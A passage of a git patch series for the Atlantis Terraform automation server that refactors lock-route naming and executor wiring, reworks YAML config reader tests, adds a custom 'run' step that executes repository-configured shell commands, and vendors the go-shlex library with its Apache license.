-const LockRouteName = "lock-detail"
+const (
+	// LockViewRouteName is the named route in mux.Router for the lock view.
+	// The route can be retrieved by this name, ex:
+	//   mux.Router.Get(LockViewRouteName)
+	LockViewRouteName = "lock-detail"
+	// LockViewRouteIDQueryParam is the query parameter needed to construct the lock view
+	// route. ex:
+	//   mux.Router.Get(LockViewRouteName).URL(LockViewRouteIDQueryParam, "my id")
+	LockViewRouteIDQueryParam = "id"
+)
 
 // Server runs the Atlantis web server.
 type Server struct {
@@ -184,29 +194,44 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) {
 	workspace := &events.FileWorkspace{
 		DataDir: userConfig.DataDir,
 	}
-	projectPreExecute := &events.DefaultProjectPreExecutor{
+	projectLocker := &events.DefaultProjectLocker{
 		Locker:       lockingClient,
 		Run:          run,
 		ConfigReader: configReader,
 		Terraform:    terraformClient,
 	}
+	executionPlanner := &repoconfig.ExecutionPlanner{
+		ConfigReader:      &repoconfig.Reader{},
+		DefaultTFVersion:  terraformClient.Version(),
+		TerraformExecutor: terraformClient,
+	}
+	underlyingRouter := mux.NewRouter()
+	router := &Router{
+		AtlantisURL:               userConfig.AtlantisURL,
+		LockViewRouteIDQueryParam: LockViewRouteIDQueryParam,
+		LockViewRouteName:         LockViewRouteName,
+		Underlying:                underlyingRouter,
+	}
 	applyExecutor := &events.ApplyExecutor{
 		VCSClient:         vcsClient,
 		Terraform:         terraformClient,
 		RequireApproval:   userConfig.RequireApproval,
 		Run:               run,
 		AtlantisWorkspace: workspace,
-		ProjectPreExecute: projectPreExecute,
+		ProjectLocker:     projectLocker,
+		ExecutionPlanner:  executionPlanner,
 		Webhooks:          webhooksManager,
 	}
 	planExecutor := &events.PlanExecutor{
-		VCSClient:         vcsClient,
-		Terraform:         terraformClient,
-		Run:               run,
-		Workspace:         workspace,
-		ProjectPreExecute: projectPreExecute,
-		Locker:            lockingClient,
-		ProjectFinder:     &events.DefaultProjectFinder{},
+		VCSClient:        vcsClient,
+		Terraform:        terraformClient,
+		Run:              run,
+		Workspace:        workspace,
+		ProjectLocker:    projectLocker,
+		Locker:           lockingClient,
+		ProjectFinder:    &events.DefaultProjectFinder{},
+		ExecutionPlanner: executionPlanner,
+		LockURLGenerator: router,
 	}
 	pullClosedExecutor := &events.PullClosedExecutor{
 		VCSClient: vcsClient,
@@ -229,7 +254,6 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) {
 	commandHandler := &events.CommandHandler{
 		ApplyExecutor:            applyExecutor,
 		PlanExecutor:             planExecutor,
-		LockURLGenerator:         planExecutor,
 		EventParser:              eventParser,
 		VCSClient:                vcsClient,
 		GithubPullGetter:         githubClient,
@@ -265,10 +289,9 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) {
 		SupportedVCSHosts:      supportedVCSHosts,
 		VCSClient:              vcsClient,
 	}
-	router := mux.NewRouter()
 	return &Server{
 		AtlantisVersion:    config.AtlantisVersion,
-		Router:             router,
+		Router:             underlyingRouter,
 		Port:               userConfig.Port,
 		CommandHandler:     commandHandler,
 		Logger:             logger,
@@ -291,14 +314,7 @@ func (s *Server) Start() error {
 	s.Router.PathPrefix("/static/").Handler(http.FileServer(&assetfs.AssetFS{Asset: static.Asset, AssetDir: static.AssetDir, AssetInfo: static.AssetInfo}))
 	s.Router.HandleFunc("/events", s.EventsController.Post).Methods("POST")
 	s.Router.HandleFunc("/locks", s.LocksController.DeleteLock).Methods("DELETE").Queries("id", "{id:.*}")
-	lockRoute := s.Router.HandleFunc("/lock", s.LocksController.GetLock).Methods("GET").Queries("id", "{id}").Name(LockRouteName)
-	// function that planExecutor can use to construct detail view url
-	// injecting this here because this is the earliest routes are created
-	s.CommandHandler.SetLockURL(func(lockID string) string {
-		// ignoring error since guaranteed to succeed if "id" is specified
-		u, _ := lockRoute.URL("id", url.QueryEscape(lockID))
-		return s.AtlantisURL + u.RequestURI()
-	})
+	s.Router.HandleFunc("/lock", s.LocksController.GetLock).Methods("GET").Queries(LockViewRouteIDQueryParam, "{id}").Name(LockViewRouteName)
 	n := negroni.New(&negroni.Recovery{
 		Logger:     log.New(os.Stdout, "", log.LstdFlags),
 		PrintStack: false,
@@ -349,7 +365,7 @@ func (s *Server) Index(w http.ResponseWriter, _ *http.Request) {
 
 	var lockResults []LockIndexData
 	for id, v := range locks {
-		lockURL, _ := s.Router.Get(LockRouteName).URL("id", url.QueryEscape(id))
+		lockURL, _ := s.Router.Get(LockViewRouteName).URL("id", url.QueryEscape(id))
 		lockResults = append(lockResults, LockIndexData{
 			LockURL:      lockURL.String(),
 			RepoFullName: v.Project.RepoFullName,
diff --git a/server/server_test.go b/server/server_test.go
index aba146ef54..54776cfe9e 100644
--- a/server/server_test.go
+++ b/server/server_test.go
@@ -78,7 +78,7 @@ func TestIndex_Success(t *testing.T) {
 	r := mux.NewRouter()
 	atlantisVersion := "0.3.1"
 	// Need to create a lock route since the server expects this route to exist.
-	r.NewRoute().Path("").Name(server.LockRouteName)
+	r.NewRoute().Path("").Name(server.LockViewRouteName)
 	s := server.Server{
 		Locker:          l,
 		IndexTemplate:   it,

From aef8a632c3b86f716a098934bacd84b3836281f1 Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Wed, 6 Jun 2018 18:54:27 +0100
Subject: [PATCH 11/69] Make tests more readable

---
 server/events/repoconfig/reader.go      |  3 +-
 server/events/repoconfig/reader_test.go | 73 ++++++++++++++++---------
 2 files changed, 47 insertions(+), 29 deletions(-)

diff --git a/server/events/repoconfig/reader.go b/server/events/repoconfig/reader.go
index 77d4e505dc..7f2557e42d 100644
--- a/server/events/repoconfig/reader.go
+++ b/server/events/repoconfig/reader.go
@@ -18,8 +18,7 @@ const ApplyStageName = "apply"
 type Reader struct{}
 
 // ReadConfig returns the parsed and validated config for repoDir.
-// If there was no config, it returns a nil pointer. If there was an error
-// in parsing it returns the error.
+// If there was no config, it returns a nil pointer.
 func (r *Reader) ReadConfig(repoDir string) (*RepoConfig, error) {
 	configFile := filepath.Join(repoDir, AtlantisYAMLFilename)
 	configData, err := ioutil.ReadFile(configFile)
diff --git a/server/events/repoconfig/reader_test.go b/server/events/repoconfig/reader_test.go
index 20e36c9cf6..9d0eb5d962 100644
--- a/server/events/repoconfig/reader_test.go
+++ b/server/events/repoconfig/reader_test.go
@@ -80,14 +80,16 @@ func TestReadConfig_Invalid(t *testing.T) {
 		// Invalid version.
 		{
 			description: "no version",
-			input: `projects:
+			input: `
+projects:
 - dir: "."
 `,
 			expErr: "unknown version: must have \"version: 2\" set",
 		},
 		{
 			description: "unsupported version",
-			input: `version: 0
+			input: `
+version: 0
 projects:
 - dir: "."
 `,
@@ -95,7 +97,8 @@ projects:
 		},
 		{
 			description: "empty version",
-			input: `version: ~
+			input: `
+version: ~
 projects:
 - dir: "."
 `,
@@ -110,7 +113,8 @@ projects:
 		},
 		{
 			description: "empty projects list",
-			input: `version: 2
+			input: `
+version: 2
 projects:`,
 			expErr: "'projects' key must exist and contain at least one element",
 		},
@@ -118,41 +122,45 @@ projects:`,
 		// Project must have dir set.
 		{
 			description: "project with no config",
-			input: `version: 2
+			input: `
+version: 2
 projects:
 -`,
 			expErr: "project at index 0 invalid: dir key must be set and non-empty",
 		},
 		{
 			description: "project without dir set",
-			input: `version: 2
+			input: `
+version: 2
 projects:
 - workspace: "staging"`,
 			expErr: "project at index 0 invalid: dir key must be set and non-empty",
 		},
 		{
 			description: "project with dir set to empty string",
-			input: `version: 2
+			input: `
+version: 2
 projects:
 - dir: ""`,
 			expErr: "project at index 0 invalid: dir key must be set and non-empty",
 		},
 		{
 			description: "project with no config at index 1",
-			input: `version: 2
+			input: `
+version: 2
 projects:
 - dir: "."
 -`,
 			expErr: "project at index 1 invalid: dir key must be set and non-empty",
 		},
-		//		{
-		//			"project with unknown key",
-		//			`version: 2
-		//projects:
-		//- unknown: value`,
-		//			// todo: fix this test case
-		//			"project at index 1 invalid: dir key must be set and non-empty",
-		//		},
+		{
+			description: "project with unknown key",
+			input: `
+version: 2
+projects:
+- unknown: value`,
+			expErr: "yaml: unmarshal errors:\n  line 4: field unknown not found in struct repoconfig.alias",
+		},
 		// todo: more test cases
 
 		// project workflow doesn't exist
@@ -311,7 +319,8 @@ func TestReadConfig_Successes(t *testing.T) {
 	}{
 		{
 			description: "uses project defaults",
-			input: `version: 2
+			input: `
+version: 2
 projects:
 - dir: "."`,
 			expOutput: repoconfig.RepoConfig{
@@ -321,7 +330,8 @@ projects:
 		},
 		{
 			description: "autoplan is enabled by default",
-			input: `version: 2
+			input: `
+version: 2
 projects:
 - dir: "."
   auto_plan:
@@ -334,7 +344,8 @@ projects:
 		},
 		{
 			description: "if workflows not defined, there are none",
-			input: `version: 2
+			input: `
+version: 2
 projects:
 - dir: "."
 `,
@@ -345,7 +356,8 @@ projects:
 		},
 		{
 			description: "if workflows key set but with no workflows there are none",
-			input: `version: 2
+			input: `
+version: 2
 projects:
 - dir: "."
 workflows: ~
@@ -357,7 +369,8 @@ workflows: ~
 		},
 		{
 			description: "if a workflow is defined but set to null we use the defaults",
-			input: `version: 2
+			input: `
+version: 2
 projects:
 - dir: "."
 workflows:
@@ -391,7 +404,8 @@ workflows:
 		},
 		{
 			description: "if a plan or apply has no steps defined then we use the defaults",
-			input: `version: 2
+			input: `
+version: 2
 projects:
 - dir: "."
 workflows:
@@ -427,7 +441,8 @@ workflows:
 		},
 		{
 			description: "if a plan or apply has no steps defined then we use the defaults",
-			input: `version: 2
+			input: `
+version: 2
 projects:
 - dir: "."
 workflows:
@@ -463,7 +478,8 @@ workflows:
 		},
 		{
 			description: "if a plan or apply explicitly defines an empty steps key then there are no steps",
-			input: `version: 2
+			input: `
+version: 2
 projects:
 - dir: "."
 workflows:
@@ -490,7 +506,8 @@ workflows:
 		},
 		{
 			description: "if a plan or apply explicitly defines an empty steps key then there are no steps",
-			input: `version: 2
+			input: `
+version: 2
 projects:
 - dir: "."
 workflows:
@@ -517,7 +534,8 @@ workflows:
 		},
 		{
 			description: "if steps are set then we parse them properly",
-			input: `version: 2
+			input: `
+version: 2
 projects:
 - dir: "."
 workflows:
@@ -554,7 +572,8 @@ workflows:
 		},
 		{
 			description: "we parse extra_args for the steps",
-			input: `version: 2
+			input: `
+version: 2
 projects:
 - dir: "."
 workflows:

From d06f3ca3d259b6ea54a6ca15d992c68655367744 Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Wed, 6 Jun 2018 22:12:30 +0100
Subject: [PATCH 12/69] Implement custom run step

---
 Gopkg.lock                                    |   8 +-
 Gopkg.toml                                    |   4 +
 server/events/plan_executor.go                |   2 +-
 server/events/repoconfig/config.go            |  39 +-
 server/events/repoconfig/execution_planner.go |   6 +-
 server/events/repoconfig/reader_test.go       | 133 ++---
 server/events/repoconfig/run_step.go          |  35 ++
 server/events/repoconfig/run_step_test.go     |   3 +
 .../github.com/flynn-archive/go-shlex/COPYING | 202 ++++++++
 .../flynn-archive/go-shlex/Makefile           |  21 +
 .../flynn-archive/go-shlex/README.md          |   2 +
 .../flynn-archive/go-shlex/shlex.go           | 457 ++++++++++++++++++
 .../flynn-archive/go-shlex/shlex_test.go      | 162 +++++++
 13 files changed, 1009 insertions(+), 65 deletions(-)
 create mode 100644 server/events/repoconfig/run_step.go
 create mode 100644 server/events/repoconfig/run_step_test.go
 create mode 100644 vendor/github.com/flynn-archive/go-shlex/COPYING
 create mode 100644 vendor/github.com/flynn-archive/go-shlex/Makefile
 create mode 100644 vendor/github.com/flynn-archive/go-shlex/README.md
 create mode 100644 vendor/github.com/flynn-archive/go-shlex/shlex.go
 create mode 100644 vendor/github.com/flynn-archive/go-shlex/shlex_test.go

diff --git a/Gopkg.lock b/Gopkg.lock
index 9b1d483313..19c0ad71bb 100644
--- a/Gopkg.lock
+++ b/Gopkg.lock
@@ -25,6 +25,12 @@
   revision = "570b54cabe6b8eb0bc2dfce68d964677d63b5260"
   version = "v1.5.0"
 
+[[projects]]
+  branch = "master"
+  name = "github.com/flynn-archive/go-shlex"
+  packages = ["."]
+  revision = "3f9db97f856818214da2e1057f8ad84803971cff"
+
 [[projects]]
   name = "github.com/fsnotify/fsnotify"
   packages = ["."]
@@ -282,6 +288,6 @@
 [solve-meta]
   analyzer-name = "dep"
   analyzer-version = 1
-  inputs-digest = "4e5fea92b65446bbdeccbdedfb28fb9c2ea21325b0335b3a4e7b98b60d47ccd6"
+  inputs-digest = "6e38170b3ac78890d7f3af87171bc9ccf81083b5196342b2f5acea10125872bd"
   solver-name = "gps-cdcl"
   solver-version = 1
diff --git a/Gopkg.toml b/Gopkg.toml
index 92f54862f5..749d2f189b 100644
--- a/Gopkg.toml
+++ b/Gopkg.toml
@@ -92,3 +92,7 @@
 [[constraint]]
   name = "github.com/go-test/deep"
   version = "1.0.1"
+
+[[constraint]]
+  branch = "master"
+  name = "github.com/flynn-archive/go-shlex"
diff --git a/server/events/plan_executor.go b/server/events/plan_executor.go
index d994021723..4983c17701 100644
--- a/server/events/plan_executor.go
+++ b/server/events/plan_executor.go
@@ -30,7 +30,7 @@ type LockURLGenerator interface {
 	GenerateLockURL(lockID string) string
 }
 
-/**/ // PlanExecutor handles everything related to running terraform plan.
+// PlanExecutor handles everything related to running terraform plan.
 type PlanExecutor struct {
 	VCSClient        vcs.ClientProxy
 	Terraform        terraform.Client
diff --git a/server/events/repoconfig/config.go b/server/events/repoconfig/config.go
index 48a0a9e388..acdc7a0ce6 100644
--- a/server/events/repoconfig/config.go
+++ b/server/events/repoconfig/config.go
@@ -1,6 +1,11 @@
 package repoconfig
 
-import "fmt"
+import (
+	"fmt"
+
+	"github.com/flynn-archive/go-shlex"
+	"github.com/pkg/errors"
+)
 
 type RepoConfig struct {
 	Version   int                 `yaml:"version"`
@@ -61,6 +66,16 @@ type Workflow struct {
 }
 
 func (p *Workflow) UnmarshalYAML(unmarshal func(interface{}) error) error {
+	// Check if they forgot to set the "steps" key.
+	type MissingSteps struct {
+		Apply []interface{}
+		Plan  []interface{}
+	}
+	var missingSteps MissingSteps
+	if err := unmarshal(&missingSteps); err == nil {
+		return errors.New("missing \"steps\" key")
+	}
+
 	// Use a type alias so unmarshal doesn't get into an infinite loop.
 	type alias Workflow
 	var tmp alias
@@ -103,6 +118,9 @@ type Stage struct {
 type StepConfig struct {
 	StepType  string
 	ExtraArgs []string
+	// Run will be set if the StepType is "run". This is for custom commands.
+	// Ex. if the key is `run: echo hi` then Run will be "echo hi".
+	Run []string
 }
 
 func (s *StepConfig) UnmarshalYAML(unmarshal func(interface{}) error) error {
@@ -174,15 +192,20 @@ func (s *StepConfig) UnmarshalYAML(unmarshal func(interface{}) error) error {
 		return validateBuiltIn("apply", applyStep.Apply)
 	}
 
-	// todo: run step
 	// Try to unmarshal as a custom run step, ex.
 	// steps:
 	// - run: my command
-	//var runStep struct {
-	//	Run string `yaml:"run"`
-	//}
-	//if err = unmarshal(&runStep); err == nil {
-	//
-	//}
+	var runStep struct {
+		Run string `yaml:"run"`
+	}
+	if err = unmarshal(&runStep); err == nil {
+		s.StepType = "run"
+		parts, err := shlex.Split(runStep.Run)
+		if err != nil {
+			return err
+		}
+		s.Run = parts
+	}
+
 	return err
 }
diff --git a/server/events/repoconfig/execution_planner.go b/server/events/repoconfig/execution_planner.go
index 02cba0496f..c94001925e 100644
--- a/server/events/repoconfig/execution_planner.go
+++ b/server/events/repoconfig/execution_planner.go
@@ -85,8 +85,12 @@ func (s *ExecutionPlanner) buildStage(stageName string, log *logging.SimpleLogge
 						Meta:      meta,
 						ExtraArgs: stepConfig.ExtraArgs,
 					}
+				case "run":
+					step = &RunStep{
+						Meta:     meta,
+						Commands: stepConfig.Run,
+					}
 				}
-				// todo: custom step
 				steps = append(steps, step)
 			}
 			return steps, nil
diff --git a/server/events/repoconfig/reader_test.go b/server/events/repoconfig/reader_test.go
index 9d0eb5d962..02fa41b342 100644
--- a/server/events/repoconfig/reader_test.go
+++ b/server/events/repoconfig/reader_test.go
@@ -161,7 +161,6 @@ projects:
 - unknown: value`,
 			expErr: "yaml: unmarshal errors:\n  line 4: field unknown not found in struct repoconfig.alias",
 		},
-		// todo: more test cases
 
 		// project workflow doesn't exist
 		// workflow has plan and apply keys (otherwise no point specifying it)
@@ -280,6 +279,33 @@ workflows:
 `,
 			expErr: "expected array of strings as value of extra_args, not \"arg\"",
 		},
+		{
+			description: "invalid step type",
+			input: `
+version: 2
+projects:
+- dir: "."
+workflows:
+  default:
+    plan:
+      steps:
+      - rn: echo should fail
+`,
+			expErr: "yaml: unmarshal errors:\n  line 9: field rn not found in struct struct { Run string \"yaml:\\\"run\\\"\" }",
+		},
+		{
+			description: "missed the steps key and just set an array directly",
+			input: `
+version: 2
+projects:
+- dir: "."
+workflows:
+  default:
+    plan:
+      - init
+`,
+			expErr: "missing \"steps\" key",
+		},
 	}
 
 	tmpDir, cleanup := TempDir(t)
@@ -408,43 +434,6 @@ workflows:
 version: 2
 projects:
 - dir: "."
-workflows:
-  default:
-    plan:
-    apply:
-`,
-			expOutput: repoconfig.RepoConfig{
-				Version:  2,
-				Projects: basicProjects,
-				Workflows: map[string]repoconfig.Workflow{
-					"default": {
-						Plan: &repoconfig.Stage{
-							Steps: []repoconfig.StepConfig{
-								{
-									StepType: "init",
-								},
-								{
-									StepType: "plan",
-								},
-							},
-						},
-						Apply: &repoconfig.Stage{
-							Steps: []repoconfig.StepConfig{
-								{
-									StepType: "apply",
-								},
-							},
-						},
-					},
-				},
-			},
-		},
-		{
-			description: "if a plan or apply has no steps defined then we use the defaults",
-			input: `
-version: 2
-projects:
-- dir: "."
 workflows:
   default:
     plan:
@@ -505,7 +494,7 @@ workflows:
 			},
 		},
 		{
-			description: "if a plan or apply explicitly defines an empty steps key then there are no steps",
+			description: "if steps are set then we parse them properly",
 			input: `
 version: 2
 projects:
@@ -514,8 +503,12 @@ workflows:
   default:
     plan:
       steps:
+      - init
+      - plan
     apply:
       steps:
+      - plan # we don't validate if they make sense
+      - apply
 `,
 			expOutput: repoconfig.RepoConfig{
 				Version:  2,
@@ -523,17 +516,31 @@ workflows:
 				Workflows: map[string]repoconfig.Workflow{
 					"default": {
 						Plan: &repoconfig.Stage{
-							Steps: nil,
+							Steps: []repoconfig.StepConfig{
+								{
+									StepType: "init",
+								},
+								{
+									StepType: "plan",
+								},
+							},
 						},
 						Apply: &repoconfig.Stage{
-							Steps: nil,
+							Steps: []repoconfig.StepConfig{
+								{
+									StepType: "plan",
+								},
+								{
+									StepType: "apply",
+								},
+							},
 						},
 					},
 				},
 			},
 		},
 		{
-			description: "if steps are set then we parse them properly",
+			description: "we parse extra_args for the steps",
 			input: `
 version: 2
 projects:
@@ -542,10 +549,18 @@ workflows:
   default:
     plan:
       steps:
-      - init
+      - init:
+          extra_args: []
+      - plan:
+          extra_args:
+          - arg1
+          - arg2
     apply:
       steps:
-      - plan # we don't validate if they make sense
+      - plan:
+          extra_args: [a, b]
+      - apply:
+          extra_args: ["a", "b"]
 `,
 			expOutput: repoconfig.RepoConfig{
 				Version:  2,
@@ -555,14 +570,24 @@ workflows:
 						Plan: &repoconfig.Stage{
 							Steps: []repoconfig.StepConfig{
 								{
-									StepType: "init",
+									StepType:  "init",
+									ExtraArgs: nil,
+								},
+								{
+									StepType:  "plan",
+									ExtraArgs: []string{"arg1", "arg2"},
 								},
 							},
 						},
 						Apply: &repoconfig.Stage{
 							Steps: []repoconfig.StepConfig{
 								{
-									StepType: "plan",
+									StepType:  "plan",
+									ExtraArgs: []string{"a", "b"},
+								},
+								{
+									StepType:  "apply",
+									ExtraArgs: []string{"a", "b"},
 								},
 							},
 						},
@@ -571,7 +596,7 @@ workflows:
 			},
 		},
 		{
-			description: "we parse extra_args for the steps",
+			description: "custom steps are parsed",
 			input: `
 version: 2
 projects:
@@ -580,12 +605,10 @@ workflows:
   default:
     plan:
       steps:
-      - init:
-          extra_args: []
+      - run: "echo \"plan hi\""
     apply:
       steps:
-      - plan:
-          extra_args: ["a", "b"]
+      - run: echo apply "arg 2"
 `,
 			expOutput: repoconfig.RepoConfig{
 				Version:  2,
@@ -595,16 +618,18 @@ workflows:
 						Plan: &repoconfig.Stage{
 							Steps: []repoconfig.StepConfig{
 								{
-									StepType:  "init",
+									StepType:  "run",
 									ExtraArgs: nil,
+									Run:       []string{"echo", "plan hi"},
 								},
 							},
 						},
 						Apply: &repoconfig.Stage{
 							Steps: []repoconfig.StepConfig{
 								{
-									StepType:  "plan",
-									ExtraArgs: []string{"a", "b"},
+									StepType:  "run",
+									ExtraArgs: nil,
+									Run:       []string{"echo", "apply", "arg 2"},
 								},
 							},
 						},
diff --git a/server/events/repoconfig/run_step.go b/server/events/repoconfig/run_step.go
new file mode 100644
index 0000000000..7a157bb6fb
--- /dev/null
+++ b/server/events/repoconfig/run_step.go
@@ -0,0 +1,35 @@
+package repoconfig
+
+import (
+	"fmt"
+	"os/exec"
+	"strings"
+
+	"github.com/pkg/errors"
+)
+
+// RunStep runs custom commands.
+type RunStep struct {
+	Commands []string
+	Meta     StepMeta
+}
+
+func (r *RunStep) Run() (string, error) {
+	if len(r.Commands) < 1 {
+		return "", errors.New("no commands for run step")
+	}
+	path := r.Meta.AbsolutePath
+
+	cmd := exec.Command("sh", "-c", strings.Join(r.Commands, " ")) // #nosec
+	cmd.Dir = path
+	out, err := cmd.CombinedOutput()
+
+	commandStr := strings.Join(r.Commands, " ")
+	if err != nil {
+		err = fmt.Errorf("%s: running %q in %q: \n%s", err, commandStr, path, out)
+		r.Meta.Log.Debug("error: %s", err)
+		return string(out), err
+	}
+	r.Meta.Log.Info("successfully ran %q in %q", commandStr, path)
+	return string(out), nil
+}
diff --git a/server/events/repoconfig/run_step_test.go b/server/events/repoconfig/run_step_test.go
new file mode 100644
index 0000000000..fdab8a9b5f
--- /dev/null
+++ b/server/events/repoconfig/run_step_test.go
@@ -0,0 +1,3 @@
+package repoconfig
+
+// todo
diff --git a/vendor/github.com/flynn-archive/go-shlex/COPYING b/vendor/github.com/flynn-archive/go-shlex/COPYING
new file mode 100644
index 0000000000..d645695673
--- /dev/null
+++ b/vendor/github.com/flynn-archive/go-shlex/COPYING
@@ -0,0 +1,202 @@
+
+                                 Apache License
+                           Version 2.0, January 2004
+                        http://www.apache.org/licenses/
+
+   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
+
+   1. Definitions.
+
+      "License" shall mean the terms and conditions for use, reproduction,
+      and distribution as defined by Sections 1 through 9 of this document.
+
+      "Licensor" shall mean the copyright owner or entity authorized by
+      the copyright owner that is granting the License.
+
+      "Legal Entity" shall mean the union of the acting entity and all
+      other entities that control, are controlled by, or are under common
+      control with that entity. For the purposes of this definition,
+      "control" means (i) the power, direct or indirect, to cause the
+      direction or management of such entity, whether by contract or
+      otherwise, or (ii) ownership of fifty percent (50%) or more of the
+      outstanding shares, or (iii) beneficial ownership of such entity.
+
+      "You" (or "Your") shall mean an individual or Legal Entity
+      exercising permissions granted by this License.
+
+      "Source" form shall mean the preferred form for making modifications,
+      including but not limited to software source code, documentation
+      source, and configuration files.
+
+      "Object" form shall mean any form resulting from mechanical
+      transformation or translation of a Source form, including but
+      not limited to compiled object code, generated documentation,
+      and conversions to other media types.
+
+      "Work" shall mean the work of authorship, whether in Source or
+      Object form, made available under the License, as indicated by a
+      copyright notice that is included in or attached to the work
+      (an example is provided in the Appendix below).
+
+      "Derivative Works" shall mean any work, whether in Source or Object
+      form, that is based on (or derived from) the Work and for which the
+      editorial revisions, annotations, elaborations, or other modifications
+      represent, as a whole, an original work of authorship. For the purposes
+      of this License, Derivative Works shall not include works that remain
+      separable from, or merely link (or bind by name) to the interfaces of,
+      the Work and Derivative Works thereof.
+
+      "Contribution" shall mean any work of authorship, including
+      the original version of the Work and any modifications or additions
+      to that Work or Derivative Works thereof, that is intentionally
+      submitted to Licensor for inclusion in the Work by the copyright owner
+      or by an individual or Legal Entity authorized to submit on behalf of
+      the copyright owner. For the purposes of this definition, "submitted"
+      means any form of electronic, verbal, or written communication sent
+      to the Licensor or its representatives, including but not limited to
+      communication on electronic mailing lists, source code control systems,
+      and issue tracking systems that are managed by, or on behalf of, the
+      Licensor for the purpose of discussing and improving the Work, but
+      excluding communication that is conspicuously marked or otherwise
+      designated in writing by the copyright owner as "Not a Contribution."
+
+      "Contributor" shall mean Licensor and any individual or Legal Entity
+      on behalf of whom a Contribution has been received by Licensor and
+      subsequently incorporated within the Work.
+
+   2. Grant of Copyright License. Subject to the terms and conditions of
+      this License, each Contributor hereby grants to You a perpetual,
+      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+      copyright license to reproduce, prepare Derivative Works of,
+      publicly display, publicly perform, sublicense, and distribute the
+      Work and such Derivative Works in Source or Object form.
+
+   3. Grant of Patent License. Subject to the terms and conditions of
+      this License, each Contributor hereby grants to You a perpetual,
+      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+      (except as stated in this section) patent license to make, have made,
+      use, offer to sell, sell, import, and otherwise transfer the Work,
+      where such license applies only to those patent claims licensable
+      by such Contributor that are necessarily infringed by their
+      Contribution(s) alone or by combination of their Contribution(s)
+      with the Work to which such Contribution(s) was submitted. If You
+      institute patent litigation against any entity (including a
+      cross-claim or counterclaim in a lawsuit) alleging that the Work
+      or a Contribution incorporated within the Work constitutes direct
+      or contributory patent infringement, then any patent licenses
+      granted to You under this License for that Work shall terminate
+      as of the date such litigation is filed.
+
+   4. Redistribution. You may reproduce and distribute copies of the
+      Work or Derivative Works thereof in any medium, with or without
+      modifications, and in Source or Object form, provided that You
+      meet the following conditions:
+
+      (a) You must give any other recipients of the Work or
+          Derivative Works a copy of this License; and
+
+      (b) You must cause any modified files to carry prominent notices
+          stating that You changed the files; and
+
+      (c) You must retain, in the Source form of any Derivative Works
+          that You distribute, all copyright, patent, trademark, and
+          attribution notices from the Source form of the Work,
+          excluding those notices that do not pertain to any part of
+          the Derivative Works; and
+
+      (d) If the Work includes a "NOTICE" text file as part of its
+          distribution, then any Derivative Works that You distribute must
+          include a readable copy of the attribution notices contained
+          within such NOTICE file, excluding those notices that do not
+          pertain to any part of the Derivative Works, in at least one
+          of the following places: within a NOTICE text file distributed
+          as part of the Derivative Works; within the Source form or
+          documentation, if provided along with the Derivative Works; or,
+          within a display generated by the Derivative Works, if and
+          wherever such third-party notices normally appear. The contents
+          of the NOTICE file are for informational purposes only and
+          do not modify the License. You may add Your own attribution
+          notices within Derivative Works that You distribute, alongside
+          or as an addendum to the NOTICE text from the Work, provided
+          that such additional attribution notices cannot be construed
+          as modifying the License.
+
+      You may add Your own copyright statement to Your modifications and
+      may provide additional or different license terms and conditions
+      for use, reproduction, or distribution of Your modifications, or
+      for any such Derivative Works as a whole, provided Your use,
+      reproduction, and distribution of the Work otherwise complies with
+      the conditions stated in this License.
+
+   5. Submission of Contributions. Unless You explicitly state otherwise,
+      any Contribution intentionally submitted for inclusion in the Work
+      by You to the Licensor shall be under the terms and conditions of
+      this License, without any additional terms or conditions.
+      Notwithstanding the above, nothing herein shall supersede or modify
+      the terms of any separate license agreement you may have executed
+      with Licensor regarding such Contributions.
+
+   6. Trademarks. This License does not grant permission to use the trade
+      names, trademarks, service marks, or product names of the Licensor,
+      except as required for reasonable and customary use in describing the
+      origin of the Work and reproducing the content of the NOTICE file.
+
+   7. Disclaimer of Warranty. Unless required by applicable law or
+      agreed to in writing, Licensor provides the Work (and each
+      Contributor provides its Contributions) on an "AS IS" BASIS,
+      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
+      implied, including, without limitation, any warranties or conditions
+      of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
+      PARTICULAR PURPOSE. You are solely responsible for determining the
+      appropriateness of using or redistributing the Work and assume any
+      risks associated with Your exercise of permissions under this License.
+
+   8. Limitation of Liability. In no event and under no legal theory,
+      whether in tort (including negligence), contract, or otherwise,
+      unless required by applicable law (such as deliberate and grossly
+      negligent acts) or agreed to in writing, shall any Contributor be
+      liable to You for damages, including any direct, indirect, special,
+      incidental, or consequential damages of any character arising as a
+      result of this License or out of the use or inability to use the
+      Work (including but not limited to damages for loss of goodwill,
+      work stoppage, computer failure or malfunction, or any and all
+      other commercial damages or losses), even if such Contributor
+      has been advised of the possibility of such damages.
+
+   9. Accepting Warranty or Additional Liability. While redistributing
+      the Work or Derivative Works thereof, You may choose to offer,
+      and charge a fee for, acceptance of support, warranty, indemnity,
+      or other liability obligations and/or rights consistent with this
+      License. However, in accepting such obligations, You may act only
+      on Your own behalf and on Your sole responsibility, not on behalf
+      of any other Contributor, and only if You agree to indemnify,
+      defend, and hold each Contributor harmless for any liability
+      incurred by, or claims asserted against, such Contributor by reason
+      of your accepting any such warranty or additional liability.
+
+   END OF TERMS AND CONDITIONS
+
+   APPENDIX: How to apply the Apache License to your work.
+
+      To apply the Apache License to your work, attach the following
+      boilerplate notice, with the fields enclosed by brackets "[]"
+      replaced with your own identifying information. (Don't include
+      the brackets!)  The text should be enclosed in the appropriate
+      comment syntax for the file format. We also recommend that a
+      file or class name and description of purpose be included on the
+      same "printed page" as the copyright notice for easier
+      identification within third-party archives.
+
+   Copyright [yyyy] [name of copyright owner]
+
+   Licensed under the Apache License, Version 2.0 (the "License");
+   you may not use this file except in compliance with the License.
+   You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+   Unless required by applicable law or agreed to in writing, software
+   distributed under the License is distributed on an "AS IS" BASIS,
+   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+   See the License for the specific language governing permissions and
+   limitations under the License.
